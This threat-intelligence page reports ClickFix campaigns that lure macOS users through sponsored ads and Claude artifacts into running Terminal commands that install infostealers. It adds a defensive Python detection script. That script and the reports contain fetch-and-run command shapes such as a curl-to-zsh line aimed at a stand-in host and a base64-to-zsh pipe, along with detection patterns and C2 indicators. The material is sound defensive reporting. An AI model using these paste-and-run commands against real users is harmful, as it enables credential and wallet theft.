Mallory

ClickFix Campaign Abuses Claude Artifacts and Google Ads to Deliver macOS Infostealers

Tags: infostealer, clickfix, google ads, user-agent spoofing, claude.ai, claude artifacts, apple support, macos, sponsored search, applescript, browser data, social engineering, data exfiltration, curl, http post

Updated February 16, 2026 at 11:01 AM · 4 sources


Threat actors are running a ClickFix-style social-engineering campaign that abuses Google sponsored search results to funnel macOS users to malicious content hosted on legitimate platforms, including Anthropic Claude public artifacts (claude.ai) and Medium pages impersonating trusted sources (e.g., Apple Support). The lures target common search queries such as “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew,” then instruct victims to paste and run Terminal commands that decode/execute payloads (e.g., `echo "..." | base64 -D | zsh` or `curl ... | zsh`). Researchers (Moonlock Lab/MacPaw and AdGuard) reported that the malicious Claude artifact accumulated ~12,300 to 15,600 views, indicating significant exposure (reported as 10,000+ and 15,000+ potential victims across coverage).

The payloads deliver macOS information-stealing malware, including MacSync, which collects data such as Keychain credentials, browser data, and cryptocurrency wallet files. Reported tradecraft includes downloading and executing a shell script, using an AppleScript component for theft, staging stolen data into `/tmp/osalogging.zip`, and exfiltrating via HTTP POST to attacker infrastructure (e.g., `a2abotnet[.]com/gate`, with C2 paths like `a2abotnet[.]com/dynamic`). The malware attempts to blend in by spoofing legitimate macOS browser User-Agent strings and includes retry logic for large/chunked uploads, then removes staging artifacts to reduce forensic traces.
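As an added illustration (not code from any of the reports summarized here), the following Python triage script turns the tradecraft described above into detection checks over constructed process-execution and egress records. The sample command lines, the host `lure.example`, and the process names are constructed; the typosquatted Homebrew host is taken from the related Cuckoo Stealer story on this page.

```python
import re

# Indicators drawn from the reported tradecraft: a base64-decoded command piped into a
# shell, curl piped straight into a shell, the reported staging archive, the reported
# C2 host (matched defanged or not), and the typosquatted Homebrew host.
COMMAND_RULES = [
    ("base64_decode_to_shell", re.compile(r"base64\s+(?:-D|-d|--decode)\b[^|]*\|\s*(?:zsh|bash|sh)\b")),
    ("curl_to_shell", re.compile(r"\bcurl\b[^|]*\|\s*(?:zsh|bash|sh)\b")),
    ("staging_archive", re.compile(r"/tmp/osalogging\.zip")),
    ("known_c2_host", re.compile(r"a2abotnet\[?\.\]?com")),
    ("homebrew_typosquat", re.compile(r"raw\.homabrews\.org")),
]

# The stealer is reported to spoof a macOS browser User-Agent for its POST exfiltration,
# so a browser-looking UA sent by a non-browser process is the signal worth checking.
BROWSER_UA = re.compile(r"Mozilla/5\.0 \(Macintosh;")
BROWSER_PROCESSES = {"Safari", "Google Chrome", "firefox", "Microsoft Edge"}

def classify_command(cmd: str) -> list[str]:
    """Return the names of every command-line rule the string matches, in rule order."""
    return [name for name, rx in COMMAND_RULES if rx.search(cmd)]

def suspicious_post(process: str, method: str, path: str, user_agent: str) -> bool:
    """Flag a POST to a /gate-style path carrying a browser UA from a non-browser process."""
    return (method.upper() == "POST" and path.startswith("/gate")
            and BROWSER_UA.search(user_agent) is not None
            and process not in BROWSER_PROCESSES)

def triage(events):
    """events: (parent_process, command_line) tuples; returns only those that hit a rule."""
    return [(parent, cmd, classify_command(cmd)) for parent, cmd in events if classify_command(cmd)]

# Constructed process-execution records, not real telemetry. The third line is the
# legitimate Homebrew installer shape (no pipe), kept here as a false-positive check.
SAMPLE_EVENTS = [
    ("Terminal", 'echo "ZWNobyBoaQo=" | base64 -D | zsh'),
    ("Terminal", "curl -fsSL https://lure.example/clean.sh | zsh"),
    ("Terminal", 'bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'),
    ("zsh", "zip -r /tmp/osalogging.zip /tmp/osalogging"),
    ("Terminal", "du -sh ~/Library/Caches"),
]

if __name__ == "__main__":
    for parent, cmd, tags in triage(SAMPLE_EVENTS):
        print(f"[{', '.join(tags)}] {parent}: {cmd}")
    print(suspicious_post("osascript", "POST", "/gate", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)"))
```

`curl_to_shell` on its own also fires on many legitimate installers, so treat it as a low-severity signal and escalate when it co-occurs with a browser-spawned Terminal session or one of the stronger indicators.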

Related Stories

ClickFix Campaigns Deliver MacSync Infostealer to macOS Users


Researchers reported **three ClickFix campaigns** that used social engineering rather than software exploitation to infect **macOS** users with the **MacSync** infostealer. The activity evolved over several months, beginning with fake sponsored search results for an **OpenAI Atlas** browser download hosted on fraudulent pages, then shifting to malicious workflows that abused shared **ChatGPT** conversations and GitHub-themed landing pages to make the infection chain appear legitimate. In each case, victims were instructed to open **Terminal** and paste commands, allowing the malware to be installed through user action instead of a traditional exploit. The most recent campaign introduced a more advanced **MacSync** variant with **multi-stage loaders**, **dynamic AppleScript payloads**, and **in-memory execution** intended to improve evasion and persistence. Reporting indicates the later activity targeted users in **Belgium, India, and parts of North and South America**, while researchers said it remains unclear whether all three campaigns were conducted by the same threat actor. The findings underscore a broader trend of attackers adapting **ClickFix** lures for macOS, using trusted platforms, sponsored links, and fake AI-tool installers to steal credentials and other sensitive data while bypassing file-based defenses by persuading users to execute the attack themselves.

Today
ClickFix Social Engineering Drives Multi-Platform Malware Delivery


Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.

3 weeks ago
Malicious Google Search Ads and Forged Apple Pages Trick macOS Users Into Running Terminal Commands


Security researchers reported an active macOS social-engineering campaign that abuses **Google Search sponsored results** and Google-hosted content (notably `docs.google.com`, and also `business.google.com`) to funnel users to **forged Apple Support-like pages** and other lookalike content (including Medium posts). The pages instruct victims—often searching for “mac cleaner” tools or macOS maintenance tasks like clearing cache—to copy/paste an **obfuscated Base64** command into **Terminal**, which then downloads and executes a follow-on script with the user’s permissions. Once executed, the payload can enable remote access and data theft, including harvesting sensitive files and **SSH keys**, and may also deploy additional malware or cryptomining. One report ties the activity to delivery of the **AMOS (aka SOMA) stealer**, which was observed creating artifacts such as `.agent` (AppleScript used to run theft), `.mainHelper` (Mach-O binary), and `.pass` (password stored in plaintext), and attempting to access user data including **Documents** and **Notes**. Researchers also noted the apparent use of **compromised, Google-verified advertiser accounts** to place the malicious ads, helping the campaign bypass ad-platform trust checks.

1 month ago
